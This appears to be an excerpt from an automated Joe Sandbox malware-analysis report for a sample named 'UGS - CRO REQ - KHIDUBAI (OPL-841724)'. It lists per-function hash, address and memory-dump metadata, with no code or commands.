Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7617c721d8e72f8f19018f9684544b264e2fd583036b45792b66bc3a58f3a49
Instruction ID: 8f1899a6c1a1edf71edd71712792b962c50e887c957acf0b01f537667e6454dc
Opcode Fuzzy Hash: d7617c721d8e72f8f19018f9684544b264e2fd583036b45792b66bc3a58f3a49
Instruction Fuzzy Hash: 68D0223314C4844EC3038294DC52958BF228B41110B0CC0AFD40CCB7C3C61BD4178640

Uniqueness

Uniqueness Score: -1.00%

Function 0061BBE0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269a9a1e8c2e2f738feed5b6e93d4a27c782fc1a79cf3f26210a792068b47fb9
Instruction ID: 1961c124d9f2ec18e01c6165d2006e376929f951008c139d244a94147c53b4b8
Opcode Fuzzy Hash: 269a9a1e8c2e2f738feed5b6e93d4a27c782fc1a79cf3f26210a792068b47fb9
Instruction Fuzzy Hash: BDD0A93080C2C00EC307C2A0A860A947F719B83228F2980DFC488CB3A3C623980BCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00616FA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ae9c79ad03371346a72c31ef8e80d97759f982ee0b7f59afce834e3955c10b
Instruction ID: 1e8ba8bc7f39d2b3421726777bf90aef29368b6c50c010edc6363866967b9253
Opcode Fuzzy Hash: 32ae9c79ad03371346a72c31ef8e80d97759f982ee0b7f59afce834e3955c10b
Instruction Fuzzy Hash: 6AD09E3550E3C45FD347C774E4919547FB09E4721832D85EED459CF2A3CA26A407CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0061D438 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ef42c1057c001ee71fb3fa59466a7c0c648d4f59a3f9e326711018af0ffb5a
Instruction ID: bfc70c2b89f75250fc3a4eef17a09ccd8bf0bf77bf04e5fb978f414f14181715
Opcode Fuzzy Hash: a1ef42c1057c001ee71fb3fa59466a7c0c648d4f59a3f9e326711018af0ffb5a
Instruction Fuzzy Hash: AFD0023100E554DB8A586FD5B81D4B97BBA65503067690017F557848605B3438D6F9A3

Uniqueness

Uniqueness Score: -1.00%

Function 0061C700 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82db405a4b97b19513881ef2c8dabce430a9152110eece9c2c452e3459cadecf
Instruction ID: ad05db37a3b79017eccbcc0d9b4b2045882d77bac24779a68683dbc64c022976
Opcode Fuzzy Hash: 82db405a4b97b19513881ef2c8dabce430a9152110eece9c2c452e3459cadecf
Instruction Fuzzy Hash: 4ED0C93114D2C16FC317C7B8D8A18557FB4DE9720830980EFE449CB6A3DB26A81AE791

Uniqueness

Uniqueness Score: -1.00%

Function 007D1B41 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7353903f600d8263e3b0efb6129b973f8f9d10824156717ce91ca9f66aba95
Instruction ID: 710e14bf313e113efe197ba763ef12abad899869c7249d50a8923ddb23502708
Opcode Fuzzy Hash: cc7353903f600d8263e3b0efb6129b973f8f9d10824156717ce91ca9f66aba95
Instruction Fuzzy Hash: 26D0A96500E3C09FC703C7308CA80C43F309C0B02275846CBC0E28E9E3E3A0998EEB62

Uniqueness

Uniqueness Score: -1.00%

Function 04EF61A8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa62c3f60bd6b98288f9fa48e02fb357e219988b77cd61fc13ce8e80e3c1649f
Instruction ID: f26be908c4a23b04a72b2040c9027a2e61913d1fbdec8fcbe4e9c1586bdc6d09
Opcode Fuzzy Hash: fa62c3f60bd6b98288f9fa48e02fb357e219988b77cd61fc13ce8e80e3c1649f
Instruction Fuzzy Hash: 31C08C212081280386052A88A8112EB328DCF86A21F00006BA109877818E541D0202E6

Uniqueness

Uniqueness Score: -1.00%

Function 04EF6EB0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
Instruction ID: 58c7e918dc9fc6e739d0296992eb27fcb8a7bf4254ad48f247067e0340e6a738
Opcode Fuzzy Hash: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
Instruction Fuzzy Hash: A6C012313402095BD304CA88C842A22B3AADBC8614B14C079A808C7746DE36EC028694

Uniqueness

Uniqueness Score: -1.00%

Function 0061829F Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3806d98d0b54d5d62c2c56130ade2e9dba6d1854384937c8bcc6aae3bb39db5
Instruction ID: cb92636d5fef0ddf9f7151cdb3c8c381ee10a9202b273d7654d50ebb5bac7684
Opcode Fuzzy Hash: c3806d98d0b54d5d62c2c56130ade2e9dba6d1854384937c8bcc6aae3bb39db5
Instruction Fuzzy Hash: 59D080661055C0DFD311CE34C9596447F72DFA1604759CAEEDC458B587C726DC17C315

Uniqueness

Uniqueness Score: -1.00%

Function 0061C3E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
Instruction ID: 58c7e918dc9fc6e739d0296992eb27fcb8a7bf4254ad48f247067e0340e6a738
Opcode Fuzzy Hash: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
Instruction Fuzzy Hash: A6C012313402095BD304CA88C842A22B3AADBC8614B14C079A808C7746DE36EC028694

Uniqueness

Uniqueness Score: -1.00%

Function 004F57FE Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c533359947a8e2b2f80c5bc84dbaef60392404cd01e3e8b6cc3414158e3accd
Instruction ID: e54e86835595294ae0bba1d9f800359616980eab42528124fbdb1962b577efc7
Opcode Fuzzy Hash: 9c533359947a8e2b2f80c5bc84dbaef60392404cd01e3e8b6cc3414158e3accd
Instruction Fuzzy Hash: 34D0C936E00628CBCB20DE44E0007FDB760FB403A5F110093CB05A7A0093349A658AD6

Uniqueness

Uniqueness Score: -1.00%

Function 04EF34A0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 04EF8820 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
Instruction ID: 1559b7bb1d66cdfc4324202593fed40f7269f97be06a62174427e62a94373c76
Opcode Fuzzy Hash: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
Instruction Fuzzy Hash: 8DC00235280208AFD7109A55DC46F457B68AB15B50F554091F7045F6A1C6A2E8109A98

Uniqueness

Uniqueness Score: -1.00%

Function 04EF06E0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 04EFF6D0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
Instruction ID: 1559b7bb1d66cdfc4324202593fed40f7269f97be06a62174427e62a94373c76
Opcode Fuzzy Hash: 6b3cf73ecc0437b7ba418ab1aa0e16a313d668e98a5c47dae4f63aedb3a58e83
Instruction Fuzzy Hash: 8DC00235280208AFD7109A55DC46F457B68AB15B50F554091F7045F6A1C6A2E8109A98

Uniqueness

Uniqueness Score: -1.00%

Function 04EF5698 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 0061C378 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 0061ABC8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 00619DB0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694

Uniqueness

Uniqueness Score: -1.00%

Function 006166A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684

Uniqueness

Uniqueness Score: -1.00%

Function 00616700 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b71607be9f7235c8a419f509db93f804d2e602e7e6beacc654deb6a87ac8cf
Instruction ID: d7becbf3f5380f7f4629b8a054a796af7a7ac4a311b2a79bb75cc144476e1c28
Opcode Fuzzy Hash: e1b71607be9f7235c8a419f509db93f804d2e602e7e6beacc654deb6a87ac8cf
Instruction Fuzzy Hash: DEC08C3294C1808FD702D3A4CC20004BFB29F6320832C80EBA04DCB6B3E167C8038B10

Uniqueness

Uniqueness Score: -1.00%

Function 006179A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684

Uniqueness

Uniqueness Score: -1.00%

Function 0060F5DA Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46dd1f05550a3644c65c8fdf94474d3b205ec78a8dceb144a2b0e7d8f4782855
Instruction ID: c6d45c2b3fa42d69cc29f6e3d767c109718032e65f454f0f3476adc64e2894a3
Opcode Fuzzy Hash: 46dd1f05550a3644c65c8fdf94474d3b205ec78a8dceb144a2b0e7d8f4782855
Instruction Fuzzy Hash: 57D0C97004E7C0AFC7279B6458654127F716A5330476448DFE8808619BC239C966D756

Uniqueness

Uniqueness Score: -1.00%

Function 00602851 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcf673477d121598f0437963a18f541a67fb99940d387551b119ac9e130d5dae
Instruction ID: 744eb2b7f0000a1be69fbdec76d5d04e024677328916547378f49dc2326525f8
Opcode Fuzzy Hash: fcf673477d121598f0437963a18f541a67fb99940d387551b119ac9e130d5dae
Instruction Fuzzy Hash: 6FD0CAA044D3C14FCB0387309CA8B00BF60AF83602F0A82CBA084AB8A3D2A84508D722

Uniqueness

Uniqueness Score: -1.00%

Function 0061A6C7 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f3fcc5f626b5b23bbd0ea275c30baec182413ce2fe1741c4543080eb47466c
Instruction ID: 3b9fd23479aa10ef2fff0b7cbe20b3e7f0f8641937c59d9e6d4bef238ffdecbf
Opcode Fuzzy Hash: e2f3fcc5f626b5b23bbd0ea275c30baec182413ce2fe1741c4543080eb47466c
Instruction Fuzzy Hash: D6D0E938A050049FC744CB84D890DA9F772EF88314F29C055AC1557365CA32EC43DB41

Uniqueness

Uniqueness Score: -1.00%

Function 04EF2490 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 04EF2E70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 04EF5B70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 00616260 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 00616340 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 0061C650 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 006177C0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 00617940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 00619910 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Uniqueness

Uniqueness Score: -1.00%

Function 00617CF0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
